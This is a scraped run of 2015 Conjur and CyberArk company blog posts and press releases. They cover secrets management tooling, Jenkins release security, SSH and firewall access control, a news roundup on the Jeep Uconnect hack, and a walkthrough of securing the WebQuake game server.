  • We’ve placed an extra burden on developers. Without proper tooling, devs are now responsible for maintaining the credentials they need to develop features. This usually means that they are in written plain-text into environment variables or files like .gitignore. Rotations require extra communication. Getting access to new credentials is often not straightforward. If security is standing in the way of someone delivering value to your organization, they will work around it.

Referenced by source control

Credentials are dependencies of the code we write. If we fail to install the Postgres library or make the Postgres password available to our application, the end result is the same: our application does not run. Library dependencies are easy, we can list them directly in source. We should treat secrets the same way, but instead of storing their values we store where they can be retrieved from. To enable this pattern, we need a format to define credential references and tooling to support retrieval.

Earlier this summer, we (the devteam at Conjur) released a format and tooling to enable exactly this workflow. They are both open-source and you can use them whether or not you are a Conjur customer. We wrote them because existing OSS solutions didn’t meet our needs, namely: works with everything we use and is easy to deploy (we wrote this tooling in Go for easy distribution).

secrets.yml is a format that maps environment variables to where credentials are stored. An example:

summon is a command-line tool that will resolve the references in secrets.yml and inject them as environment variables into any child process. When the process exits, the secrets are not left on the system. You only need to prefix your command with ‘summon’:

summon chef-client --once or summon bundle exec rackup or summon aws s3 cp ...

Summon works with any tooling you already use that accepts environment variables (Chef, Puppet, Docker, any programming language, etc). It is also not Conjur-specific, we wrote it to work with pluggable providers (systems that hold your secrets). We’ve written AWS S3, OSX keychain and Conjur providers so far, but we’d love to see more providers in the community. Take a look and tell us what you think.


In conclusion, managing secrets for complex infrastructure and distributed applications is hard. We as engineers bear the responsibility of coming up with a solution that works for our organizations. Checking secrets into source control sets you up for future headaches, even if the respository is private. Removing secrets from source control creates new problems to solve. Together, we can work on better security tooling that reinforces collaboration and doesn’t significantly impact our velocity.

 

]]>
DevOps and Security: The Five Monkeys https://www.cyberark.com/blog/devops-and-security-the-five-monkeys/ Mon, 31 Aug 2015 20:33:00 +0000 https://cyberarkvx2.wpengine.com/blog/devops-and-security-the-five-monkeys/  

August has been a busy month for me as the developer advocate at Conjur. I gave a talk at DevOpsDays Pittsburgh, organized the monthly Boston DevOps meetup and just got back from DevOpsDays Chicago. I have the opportunity to talk to a lot of people and learn about how they align DevOps and security. It’s a hard problem. Today I’d like to share with you a story about monkeys. It’s relevant, I promise. Read on.

The Five Monkeys story is a popular tale of a scientific experiment performed in the late 1960s. It goes like this:
A group of scientists placed five monkeys in a cage, and in the middle, a ladder with bananas on top.

Every time a monkey went up the ladder, the scientists soaked the rest of the monkeys with cold water.

After a while, every time a monkey would start up the ladder, the others would pull it down and beat it up.

After a time, no monkey would dare try climbing the ladder, no matter how great the temptation.

The scientists then decided to replace one of the monkeys. The first thing this new monkey did was start to climb the ladder. Immediately, the others pulled him down and beat him up.

After several beatings, the new monkey learned never to go up the ladder, even though there was no evident reason not to, aside from the beatings.

The second monkey was substituted and the same occurred. The first monkey participated in the beating of the second monkey. A third monkey was changed and the same was repeated. The fourth monkey was changed, resulting in the same, before the fifth was finally replaced as well.

What was left was a group of five monkeys that – without ever having received a cold shower – continued to beat up any monkey who attempted to climb the ladder.

Grace Hopper best sums up the outcome of the experiment in this quote:
The most damaging phrase in the language is: “It’s always been done that way.”
Here’s the funny thing about the experiment: it’s not true. Someone at some point took the research of G.R. Stephenson and added in the ladder and bananas to prove their point. But, does it matter if it’s true? No. The way this story has spread only proves its point: we tend to accept what people say at face value and don’t bother with due diligence. There are blog posts and conference talks about The Five Monkeys; it’s part of the conversation now. It has given itself meta-relevance.
What does this have to do with DevOps and security? It’s relevant because there are a lot of assumptions on either side of the DevOps + security conversation. Assumptions like “We have to do this to remain compliant” or “There is no way we can audit our chatbot the way you want”. Often these assumptions are baseless – we follow them because no one wants to be the one to ask “Why?”.
  • “We’ve always done it this way”. “Why?”.
  • “We can’t do that, it’ll slow us down”. “Why?”.
  • “This checklist item is non-negotiable”. “Why?”.

“Why?” is not an accusation or a challenge. To solve the difficult problems we as an industry face integrating security into DevOps, there is no room for ego on either side. The people I’ve talked to that have had most success aligning their DevOps initiatives with security needs encourage each other to ask “Why?”. Keep in mind that this is not a one-way conversation. Some security requirements don’t make sense any more with modern workflows and infrastructure. Adopting DevOps does not mean you should throw caution to the wind. Let’s all work together and ask “Why?” more often.

 

]]>
Conjur Answers Call for Jenkins Security with New Architecture https://www.cyberark.com/blog/conjur-answers-call-for-jenkins-security-with-new-architecture/ Tue, 25 Aug 2015 11:55:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-answers-call-for-jenkins-security-with-new-architecture/  

Press Release  

New Conjur Deployment Server Reference Architecture Secures Releases of Artifacts and Enables Auditability

WALTHAM, Mass. Aug. 25, 2015 Conjur, Inc., the leading provider of security orchestration software, released a new Deployment Server Reference Architecture that secures Jenkins, the popular build and continuous integration tool. The new architecture separates the build and release machines, enforces the security of each new release of code and makes the entire process auditable.

“Jenkins provides collaborative and transparent continuous delivery but it can be difficult to control access and manage secrets required for production deployments,” said Chris Farnham, Director, Engineering at Kyruus, Inc., a leading provider of patient access and referral management solutions. “Conjur manages secrets and provides powerful privilege access capabilities that improve Jenkins’ security and compliance.”

Traditionally, DevOps teams address security and auditability concerns by running multiple Jenkins masters, adding Jenkins plugins and creating a dedicated “Jenkins” Management team. Conjur’s new Deployment Server Reference Architecture splits continuous integration and deployment. The Reference Architecture keeps the release machine and the build machine separate, so that a Jenkins job cannot publish the artifact itself. Instead, the Jenkins job has to interact with a separate release server, which will have the right credentials to publish to various destinations (e.g., RubyGems.org, Heroku, Docker Hub, etc.), but does not have the ability to build artifacts or modify them in any way.

“Jenkins powers your continuous integration through collaboration and visibility,” said Mitch Haile, Vice President of Products at Conjur. “However, Jenkins doesn’t provide access controls for deploying artifacts into production. Conjur eliminates the need to maintain secrets manually while providing powerful privilege access capabilities that enable Jenkins security and compliance. By adopting the Conjur Reference Architecture, enterprises eliminate the bottleneck in their deployment pipeline, while securing the entire system, and ultimately become more responsive to the needs of the business.”

The benefits of adopting the new architecture include:

  • Secure Login: Both Web and SSH login are powered by Conjur via the industry standard PAM system
  • Secure Secrets: Secrets that are used by Jenkins jobs are secure, organized and kept off the hard drive at all times
  • Production-Ready Artifacts: Artifacts produced by Jenkins are highly verified and trustworthy

The new architecture is available immediately at: http://info.conjur.net/live-demo-conjur.

For the blog, “Why Continuous Integration and Continuous Delivery Are Not the Same,” visit:

http://blog.conjur.net/why-continuous-integration-and-continuous-delivery-are-not-the-same.

For more information on Conjur and Jenkins, visit: http://www.conjur.net/solutions/jenkins.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.

 

]]>
Conjur Names New Vice President, Products https://www.cyberark.com/blog/conjur-names-new-vice-president-products/ Wed, 19 Aug 2015 11:55:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-names-new-vice-president-products/  

Press Release:

Startup Veteran Mitch Haile Brings More Than 15 Years of Software Design, Product Management and Executive Experience to Conjur to Lead Product Direction

WALTHAM, Mass. Aug. 19, 2015 Conjur, Inc., provider of security orchestration software, has named Mitch Haile its new Vice President, Products. Previously, Mitch was a consulting vice president at Cobalt Iron, an enterprise cloud backup company, where he led the development of the company’s proprietary software products and patent portfolio. He is responsible for managing Conjur’s product roadmap and product marketing.

“Companies developing and deploying at Web-scale know that they need to move fast, adopt the DevOps culture and move to continuous integration and delivery to remain competitive,” said Elizabeth Lawler, CEO at Conjur. “The challenge to this approach is being able to properly secure across a variety of point solutions and DevOps tools, creating gaps that leave organizations vulnerable with respect to security, including audit and compliance. With Mitch leading our product team at Conjur, he will help us to continue to grow and firmly establish Conjur as a foundational technology for current and future generations of IT systems.”

mitch-haileBefore Cobalt Iron, Mitch was CTO and VP, Engineering at Connected Data, a company that makes storage file sharing hardware and software for business users. He was CTO and Co-Founder of Pancetera Software Inc., which built virtual machine data protection products for VMware environments, acquired by Quantum (NYSE:QTM) in 2011. Mitch was among the first ten engineers hired at Data Domain (IPO 2007, sold to EMC in 2009), where he built and led the System Management group for four years. He is a named inventor on over two dozen patents pending and granted. Mitch earned a degree in computer science from The College of Wooster where he was an Arthur Holly Compton scholar.

“I am thrilled to work with the outstanding team at Conjur to drive the product roadmap and contribute to its already impressive growth,” said Mitch Haile. “The DevOps security market is growing at an enormous rate and I look forward to being able to help enterprises with their security orchestration and compliance needs.”

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.

PRContact:
Tracy Wemett
BroadPR
+1-617-868-5031

 

]]>
DevOpsDays Pittsburgh Here We Come! https://www.cyberark.com/blog/devopsdays-pittsburgh-here-we-come/ Thu, 13 Aug 2015 11:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/devopsdays-pittsburgh-here-we-come/  

Developer Advocate from Conjur Speaking on Security at DevOpsDays Pittsburgh

Conjur’s Dustin Collins is Presenting, “Security for Humans” at DevOpsDays Pittsburgh –

August 13-14, 2015 – Pittsburgh, Pennsylvania

 

WALTHAM, Mass. Aug. 13, 2015 Dustin Collins, Developer Advocate at Conjur, Inc., provider of security orchestration software, is presenting, “Security for Humans,” at DevOpsDays Pittsburgh, Thursday, August 13 – Friday, August 14, 2015 in Pittsburgh, Pennsylvania. DevOpsDays events are organized locally worldwide and bring operations and development teams together to collaborate.

WHAT:        “Security for Humans,” Presented by Conjur’s Dustin Collins at DevOpsDays Pittsburgh

WHEN:        Thursday, August, 13, 2015, 11:00 a.m. – 11:20 a.m. EDT

 

WHERE:       William Pitt Union, University of Pittsburgh, 3959 Fifth Avenue, Pittsburgh, Pennsylvania

There are many stakeholders involved when creating or assembling a security toolchain. How do you satisfy the different, and sometimes conflicting, needs of these stakeholders in a responsive way? We can use some of the concepts developed in the user experience domain to create better security tooling. User personas allow us to map out different roles that must interact with security to get their work done. These personas are living and provide a fast feedback loop when paired with user interviews. Dustin Collins talks on providing direction while allowing freedom as a key tenet to integrating security into different parts of an organization.

Dustin is a polyglot engineer and Conjur’s developer advocate. As the organizer for the Boston DevOps meetup, he is most interested in how, as a community, we can iterate on the processes and tools to enable continuous delivery of quality software. Previously, he was Principal Software Engineer at Essess, Inc. He was Senior Software Engineer at Carbonite, Python Web Developer at both 5Q Communications and LUZEO GmbH, and Web Developer at University of Northern Iowa, among other positions. Follow Dustin on Twitter @dustinmm80.

For more information or to register for the event, visit: http://www.devopsdays.org/events/2015-pittsburgh/.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.

Contact:

Tracy Wemett

BroadPR

+1-617-868-5031

tracy@broadpr.com

All trademarks recognized.

#

 

]]>
Scaling Enterprise DevOps Security With Machine Identity – Software Defined Firewall https://www.cyberark.com/blog/scaling-enterprise-devops-security-with-machine-identity-software-defined-firewall/ Wed, 12 Aug 2015 14:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-enterprise-devops-security-with-machine-identity-software-defined-firewall/  

This is the third and final part of our ‘Scaling Enterprise DevOps Security with Machine Identity’ series.  In case you missed the other posts, first we discussed Secrets Management, and next we reviewed SSH Management.  In today’s post we are going to look at the final piece of the Enterprise DevOps security puzzle – Software Defined Firewalls.

One of the most unique and interesting challenges posed by cloud architecture is the need for granular access control to web services; especially the web services which make up the “control plane”. By control plane, I mean any application or code whose job is to manage the infrastructure and application deployment pipeline itself.

small-sdfSmall Scale Specific deployment zones are created and managed by ops. Inbound and outbound traffic is governed through specific rules (pipes & channels). Security oversees the configuration of the network from a security standpoint. Developers are pretty unclear about how the whole system works; mismatches between the needs and expectations of developers, ops and security are common and costly.

large-sdfLarge Scale Each application is deployed with a software-defined firewall (SDF). Traffic between individual application instances is governed by their own personal SDF. Access rules between applications are managed in terms of application identity (to the container level), and application authorization. Each app is managed as a service, with foreign identities being given specific privileges to make requests.

Access to control plane services must be tightly managed, because in cloud infrastructure these services literally have full control over the data and applications. These control plane services require:

  • Encryption; messages and traffic must be encrypted in transit.
  • User access control; management personnel must be able to invoke services in a controlled and audited way.
  • “Robot” access control; interaction between services must be controlled and audited as well.
  • Easy-to-use traffic authorization tools; usage of network access rules to govern control plane interactions is cumbersome, frequently breaks down, and imposes a large communication and break/fix overhead on developers and operations teams.

The typical approach to securing service access is to use network techniques like security groups, NAT, VPN, etc. Over the last two years I have helped dozens of companies to deploy and secure new control plane services, and networking configuration is always the #1 time suck.

New services can’t reach the old services; old services can’t reach each other; systems administrators make conflicting changes and break each other’s config; application deployment is slowed by broken network config. Finally, security configurations are opened up wide in order to get the damn thing to work. Sometimes they are tightened up later; sometimes they’re not.

The reason it’s such a pain is because the tools (security groups, VPN, iptables, etc) don’t map cleanly to the application architecture, troubleshooting is ad-hoc, there’s no clear reporting on what’s going wrong when connectivity can’t be established, and the access control fixes aren’t simple, granular or clear.

Again, strong machine identity and authorization offers an answer : authenticate and authorize traffic in a granular way at each service entry and exit point. So, rather than configuring network zones, and then deploying code within them and relying on the network to secure the apps, the network security is deployed as part of the application artifact.

In practice, protocol-specific authentication such as an HTTPS bearer token is required on each message. The token is issued according to the client identity (machine or person), and verified on the server side by a proxy interceptor. The authorization rules map exactly to the applications, so it’s clear how to permit or deny traffic as the deployment topology changes.

Summary

Secrets management, SSH management at scale, and software-defined firewalling are three tough problems in infrastructure management. In these three posts, I’ve attempted to describe how strong machine identity and authorization can be used to solve all three of them.

Here at Conjur, we’re best known as the company that invented secrets management for DevOps. But our mission is much bigger than that: our aim is to provide an enterprise-grade security orchestration solution to secure your DevOps infrastructure.

]]> Scaling Enterprise DevOps Security With Machine Identity – SSH https://www.cyberark.com/blog/scaling-enterprise-devops-security-with-machine-identity-ssh/ Mon, 10 Aug 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-enterprise-devops-security-with-machine-identity-ssh/  

In our last post we talked about how secrets management impacts enterprise DevOps security.  Today we are going to shift our focus to another important piece of the puzzle – SSH Management.

SSH is the de-facto standard for logging into Linux machines. And it’s not just a tool for human administrators to access their machines; it’s also a very important facility for machine-to-machine access.

Small Scale A centrally managed LDAP server and a rack of machines or small cloud operation within the same premise (cloud account or data center). Ops is (carefully) managing the LDAP server, and also performing the systems admin over SSH.

Large Scale A global system, being managed by an operations team with oversight from security. Both developers and ops are using SSH access to machines, for tightly controlled purposes. Security has a reporting interface which shows the policies and behavior of the system. SSH is centrally managed and scaled globally.

Like secrets management, SSH management is composed of two parts : authentication and authorization. Authentication can be provided by passwords (bad), public keys (better), or two-factor authentication (best). Unfortunately, the de-facto standard for SSH authorization is LDAP, a technology which was originally developed in the 1980s to implement telephone directories.

In LDAP, users are organized into groups, and then access to machines is granted by configuring each machine with an LDAP “search” which is supposed to return the list of users with access to that machine. However, the LDAP “search” model is weak. Typically, the only way to give a new user access to a machine is to add them to a group that already has the desired access. And, as a side effect, the user also gets access to every other machine which is using the same (or similar) LDAP search.

In addition to this lack of granularity, LDAP is also very cumbersome to manage compared to modern API-driven products, and high-availability LDAP doesn’t work in global cloud or hybrid deployments.

With machine identity, it’s possible to deliver much better SSH granularity. Using a thin LDAP capability on top of role-based access control, each machine authenticates (“binds”) using its own unique identity. As a result, LDAP searches performed by that machine are automatically scoped and filtered to only the users with access to that machine. The LDAP “search” string becomes irrelevant, because each client machine already has its own distinct user list.

]]> Scaling Enterprise DevOps Security With Machine Identity – Secrets https://www.cyberark.com/blog/scaling-enterprise-devops-security-with-machine-identity-secrets/ Thu, 06 Aug 2015 17:27:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-enterprise-devops-security-with-machine-identity-secrets/  

The rise of DevOps has coincided with an explosion in the number of worldwide software applications and services. Agile software methods, the development of mobile applications and microservices are pushing the number of deployable artifacts ever higher, while DevOps and continuous delivery methods are shortening release cycles from monthly to hourly. Enterprise operations and IT are concurrently developing and deploying hundreds of applications.

secrets-management-keyDevOps and continuous delivery personnel must avoid being inserted directly into the middle of large-scale and frequently changing environments, or they become overwhelmed with work in the form of support tickets, deployment requests, access control changes, security updates, network reconfiguration, loading new secrets, secrets rotation, etc. Therefore, we look to deploy automated solutions for these common security and access control problems. Agile methodologies encourage us to start with “minimally viable” solutions, even for for security, access control, auditing, etc. However, these initial solutions have hard limits in terms of scalability and enterprise suitability.

Once an organization reaches about 50 developers and 500 machines, the initial “DIY” solutions start to break down, and the need for more scalable access control and security solutions becomes clear.

Specifically, the developers, operations, and security teams together face three infrastructure challenges : management and distribution of secrets, machine login access control (e.g. SSH), and authorization of web requests between applications and services. In each of these domains, it’s essential that:

  • Developers have agility and freedom regarding architecture choices and code updates
  • Operations are managing a well-defined deployment architecture which is operated by a small number of stable supporting systems
  • Security has visibility into the development and operational processes, and the ability to see their security suggestions implemented in a timely and transparent manner

These objectives are helped greatly by a strong and uniform system for assigning, tracking, and managing machine identity. Let’s explore how this is so, by taking the use cases one by one.  In this post we wil discuss Secrets Management.

Secrets Management

First, let’s frame the problem by looking at small-scale and large-scale secrets management:

small-secrets

Small-scale Ops is manually configuring a single machine, and placing the key on it by hand.

large-secretsLarge-scale Dev is pushing the code, and ops is managing the deployment through the control plane. The control plane is spinning up new applications, which are fetching code from the repository. Security is managing the secrets, which are being distributed out to the applications.

If you’ve implemented secrets management at scale, you’ve had to deal with these five requirements:

  1. Encryption; at rest and in transit.
  2. High availability; making sure that the secrets service is “always on”.
  3. Audit; detailed recording of the secrets activity.
  4. Granular distribution; sending secrets where they need to go, and nowhere else.
  5. Collaboration; developers, operations and security each need to be able to use and understand the system.

It turns out that requirements 4 and 5 are by far the most challenging problems. That’s why you’ll see the following flaws in many secrets management tools:

  • Lack of scalability; due to reliance on manual intervention, or encrypting each secret uniquely for each client machine.
  • Lack of granularity; for example, reliance on a single “API password” which can be used by any client machine to get any secret.
  • Reliance on PKI; PKI is notoriously difficult to implement, and it provides authentication but not authorization (it’s not a good way to manage granular access).
  • Obfuscation; only one of the three teams involved (dev, ops, security) understands how the system works.

Conclusion

Assuming we can rule out systems which are non-scalable, rely on a single master key, or provide authentication but not authorization, we’re left with one inevitable conclusion : a good secrets management system must provide both machine authentication and granular access control (e.g. via role-based access control).

That’s why machine identity and RBAC is the foundation of enterprise secrets management. So when you evaluate a secrets management tool, make sure you dig into its capabilities for authorization and granularity.  Make sure that developers, operations and security teams all understand how a secrets management rollout will affect them.

In the next post we will break down SSH Management and how it fits into the Enterprise DevOps Security equation.

 

]]>
Resounding Message from the 2015 CyberArk Summit: Protect What Matters Most from the Inside https://www.cyberark.com/blog/resounding-message-from-the-2015-cyberark-summit-protect-what-matters-most-from-the-inside/ Fri, 31 Jul 2015 18:10:50 +0000 https://www.cyberark.com/blog//

It’s been an exciting month for us here at CyberArk! We were honored to host two of the largest gatherings of privileged account security professionals in the world at our 2015 Summits, held in Vienna, Austria and Boston, Massachusetts over the past few weeks.

Recognizing that the battleground for securing their organization has shifted, CyberArk customers and partners from all over the world came together in record numbers to discuss how to protect what matters most on the inside. It was exciting to meet with this group of trailblazers – those leading this revolution by adapting to the new threat landscape, taking a proactive stance to security and turning the tide on today’s most formidable cyber attackers.

Our summit agendas were packed with compelling presentations by senior-level security executives from large enterprises across a number of industries – including a global systems integrator, a US-based healthcare company and a notable financial services organization.

These customer presenters urged attendees to design their security strategies on the assumption that they’ve already been breached and attackers have already broken through the perimeter. Throughout these talks, the message was clear: stopping privileged account exploits by taking a proactive, layered approach to securing privileged accounts and credentials is the best – and often last line of defense before a data breach. They spoke of the need for an end-to-end lifecycle approach to privileged account management, and illustrated how CyberArk’s extensive portfolio of privileged account security solutions has empowered them to protect their highest value assets.

The sense of urgency was palpable – organizations cannot afford to wait. Do it right and do it now. A rousing keynote speech by Carey Lohrenz, the Navy’s first female F-14 fighter pilot and Wall Street Journal bestselling author, reinforced this message of leading the charge and driving change within your organization – fearlessly and tenaciously.

Summit attendees were inspired by the message and invigorated by lively interactions, networking and fun with peers and colleagues. We have enjoyed seeing the feedback in the days following our summit events across our social media channels. Here are just a few sound bites:

  • “It was a great opportunity for networking. I witnessed multiple cases of customers working together with product staff to address use cases. Thanks for being consistently available for such conversations!”
  • “It was great to network with others and hear real-world issues and how they worked through them.”
  • “It was a good one – thanks again!”

ViennaSummit

Trailblazing Together
It was also wonderful for our team to look around these gatherings and see familiar faces we’ve known for years. Many customer and partners have been with us since the beginning, as we pioneered Digital Vault technology over a decade ago.

Even then, as we architected our solution from the ground up, our primary strategic focus was on securing enterprises against cyber attacks that take cover behind insider privileges and attack critical enterprise assets.

And just as our focus has stayed the same all these years, so has our commitment to our customers’ continued success. It’s ingrained in our business strategy and is brought to life through continued, collaborative interactions and ongoing innovation based on customer feedback and changing needs and priorities. Additionally, we’ve continued to enhance our product offerings by establishing technology alliances within the IT infrastructure and security vendor ecosystem with world-class partners.

Today, we’re proud to deliver a unique category of targeted security solutions that help companies stop reacting to cyber threats and instead, get ahead of them, preventing attack escalation before irreparable business harm is done. We are honored to be a vital security partner to more than 1,800 global businesses. Our customers have placed their trust in our team and our products, and we don’t ever take that lightly.

We’re in this with you, every step of the way, trailblazing together. And we thank you for making our 2015 Summits an overwhelming success!

]]>
Dynamic Credential Access:  Jenkins and Conjur, Revisited https://www.cyberark.com/blog/dynamic-credential-access-jenkins-and-conjur-revisited/ Fri, 31 Jul 2015 16:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/dynamic-credential-access-jenkins-and-conjur-revisited/  

Kevin previously described how Conjur secured Jenkins when building our various artifacts. We currently use release-bot to publish our artifacts, but this approach hasn’t scaled well — it’s hard to get Heroku to run the tooling we need for publishing. This post will describe a new architecture for getting our build artifacts to their various destinations.

Security when releasing code is as important as when building it. Not having a secure release process means anyone can push anything and claim it’s a release. Because Jenkins is open, having a Jenkins job push an artifact is inherently insecure and also offers no chance of auditability.

Giving Jenkins jobs temporary access to secrets for artifact building.Separating the release machine from the build machine allows for better security. Instead of having a Jenkins job publish the artifact itself, it interacts with a separate release server. The release server has the credentials to publish to various destinations (e.g. RubyGems.org, Heroku, Docker Hub, etc) but doesn’t have the ability to build artifacts or modify them in any way. This is consistent with least privilege: the Jenkins job can do builds but not push releases, the release machine can push releases but not do builds.

After a Jenkins build job runs, a Conjur employee starts the promotion process. A Makefile that’s part of the project bundles up the build artifacts, then invokes a script to kick off deployment. If the output of the build job is a set of files (e.g. the output of building a gem), the script uses scp to copy the artifact to the release machine. If the output of the build job is a docker image, the build job pushes it to our local docker repository.

Once the artifact is available to the release machine, the Jenkins promotion job uses ssh to connect to the release machine. The remote user can only execute a single command on the release machine: he can run a publishing script, but can’t do anything else. Because the release machine is granted powerful privileges, it’s important that access to it is very limited.

The publishing script labels the artifact with the build information, then asks Conjur for deployment credentials. Because it runs on a machine in the release layer, the script is authorized to use these credentials. It publishes the artifact to its destination, then writes a Conjur audit record indicating that it did so (or failed to do so).

This architecture will allow us to add new kinds of artifacts more easily than if we stuck with release-bot. We’ll be able to push them out securely, and show that only sufficiently privileged entities publish releases.

Click on the video below to see how Conjur helps give Jenkins jobs temporary access to the secrets they need to run tests and build artifacts.

 

]]>
We’re Going to Vegas… Black Hat Here We Come! https://www.cyberark.com/blog/were-going-to-vegas-black-hat-here-we-come/ Thu, 30 Jul 2015 17:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/were-going-to-vegas-black-hat-here-we-come/  

We can’t wait get in on the action and chat with the industry’s finest at Black Hat next week.

Conjur goes to Black Hat 2015Black Hat is an annual, global information security conference that emphasizes current information security research and development. Attendees of the conference can expect to experience informative trainings that Black Hat says are “driven by the needs of the security community, striving to bring together the best minds in the industry.” Professionals of all career levels are encouraged to attend. This all sounds awesome, right?

Lucky for you there is still time to register for Black Hat USA!

Conjur’s Josh Bregman will be at Black Hat from August 5-6. If you’re going to be there too let him know, Josh would love to take some time to chat with you!

You can tweet to him @kingoauth, send him an email at josh.bregman@conjur.net, or click on the link below to schedule a live demo of Conjur.

 

]]>
The Uconnect Hack And Why Companies Need To Put A Premium on Safety https://www.cyberark.com/blog/the-uconnect-hack-and-why-companies-need-to-put-a-premium-on-safety/ Mon, 27 Jul 2015 15:19:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-uconnect-hack-and-why-companies-need-to-put-a-premium-on-safety/  

There are few places we feel safer than in our cars. And why wouldn’t we, we take care of our cars, we get our tires checked, we get our oil changed, and we pay a premium for fuel. We do all of these things so that when we are in the driver’s seat we feel safe and know that as we grasp the steering wheel we are in complete control… or so we think.

carChrysler was in the news last week as hackers were able to gain control of a Jeep Cherokee’s transmission. Due to a system vulnerability, hackers Charlie Miller and Chris Valasek were able to hack into Uconnect, Chrysler’s wifi system, and stop the vehicle as it merged onto the highway, the car at a dead stop as an 18-wheeler approached.

One of the most interesting commentaries that came out of this discussion was that instead of blaming the quick advances in technology, instead of wishing for the “good old days” when everything wasn’t digital, we should put more pressure on companies to put our security first; we pay a premium for their services, they should put a premium on our safety.

Take a look at these articles for the full story and some new perspective.

Andy Greenberg, the author of this piece and the driver of the Jeep, describes his time in the driver’s seat as the car was being hacked. Andy willingly participated in the event however he was never told when and where the vehicle takeover would occur.

CTV News points out that although the security concern was only recently publicized, Chrysler was alerted to this issue nine months ago. It took a while for them to come up with a fix and even the current solution isn’t ideal– car owners must download the patch on a USB and physically install it. What is even more alarming is that only 56% of drivers have their cars fixed when there is a recall, meaning many remain vulnerable.

This LA Times editorial warned automakers that they should take the Chrysler breach as a warning. The author points out that Chrysler failed to keep the most important parts, those controlling the brakes, steering, etc. separate from the parts that communicate with the outside world. Automakers are racing to create new, high-tech vehicles, ones that showcase entertainment and connectivity, yet the creators are failing to protect the vehicles from hackers working to get into the system.

This piece on BBC.com was written in response to the hack.  A team in the UK, called NCC Group, found a similar flaw. They figured out how to hack into an entertainment system and then have access to the car’s brakes and steering. Andy Davis of NCC said that if there is an issue in the infotainment system for one manufacturer it would take only one stream of data to control multiple cars simultaneously.

Robert Nicholls of The Market Business delivers a new perspective on recent events. Instead of blaming technology for these problems we should put pressure on companies and police to stay properly informed and secure. Companies need to continue advancing technologically while also maintaining total security for their customers.

 

]]>
How Securing WebQuake Is Like Securing An Enterprise Application https://www.cyberark.com/blog/how-securing-webquake-is-like-securing-an-enterprise-application/ Mon, 20 Jul 2015 14:53:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-securing-webquake-is-like-securing-an-enterprise-application/  

Securing an Insecure App Using Conjur

Improving the security of an existing application which was not designed with security in mind is a common problem. Here’s a fun real-world example: WebQuake, a port of Quake 2 to HTML5 (client) and Node.js (server). It’s composed of the follower sub-projects:

  • Client A HTTP server (it’s not really a client…) which serves JavaScript and static assets (textures, sound etc). With only the Client web server, you can load and run single-player Quake 2 game in your browser.

  • A web browser which connects to the Client web server to retrieve the game assets and renders the game using HTML5.

  • Server which uses HTTP and WebSocket to implement multiplayer mode. From the browser, you can enter the Websocket URL to a Server; the Server will accept your connection automatically and join you to the running multi-player game.

See it for yourself (YouTube, 1 minute)

“We Didn’t Initially Prioritize Security”

Let’s Secure WebQuake

We were surprised how similar Quake is to an enterprise application in terms of the required “cleanup,” despite it being a video game. We chose it partly because it was never meant to be studied as an example of good security code. (And partly because it’s fun!)

There are several problems that need to be addressed:

Only one password per server

WebQuake implements a facility called “rcon” (remote control). From the browser, a Quake admin will send remote commands to the server, which will perform actions such as changing the map or kicking out players. “rcon” is protected by a single password which is shared among all the server admins.

Remember, password sharing is bad security because:

  • It’s impossible to revoke the access of an individual user.

  • Changing the password is difficult, because all users must be notified simultaneously

Furthermore, the WebQuake server does not have any secure mechanism for storing and restoring the password, or encrypting it at rest.

No traffic encryption

The client does not support the use of an encrypted channel. The “rcon” password we mentioned earlier is being sent over a plaintext channel.

Traffic between the browser and the servers should use HTTPS.

Weak traffic authorization

The server doesn’t implement any authorization of inbound traffic, aside from the “rcon” password.

Fixing the problems

Step 1 – kill the passwords

We will remove the “rcon” password from both the client and the server. This strips WebQuake to its core: a game, not a user authorization system!

Remove the client password:

https://github.com/conjurdemos/WebQuake/commit/668599c4b5762169f3b07d84726246aef86a3781#diff-7a8a12fcc187599b0abecad5a4258d46L477

Remove the server password:

https://github.com/conjurdemos/WebQuake/commit/1ea67dc6c9aaed52830a63d74ae6ecb2dc3b7b25#diff-635e25ef0c0a7a5d9cfa48f9fa897b65L183

Step 2 – refactor the application security architecture

Rather than use passwords to control access, we’ll use a traffic authorization gatekeeper.

Refactor with traffic authorization

To implement traffic authorization, we will add two additional services:

  • Forwarder a reverse proxy which runs on the local machine of each player. The Forwarder intercepts each connection to the server, and places an authorization token on it (which it has obtained from the Token Broker).

  • Gatekeeper a reverse proxy which sits in front of the server. It intercepts all inbound requests, and verifies the token authenticity and authorization privileges of the client with the Token Broker.

In this manner, access management is handled entirely outside WebQuake.

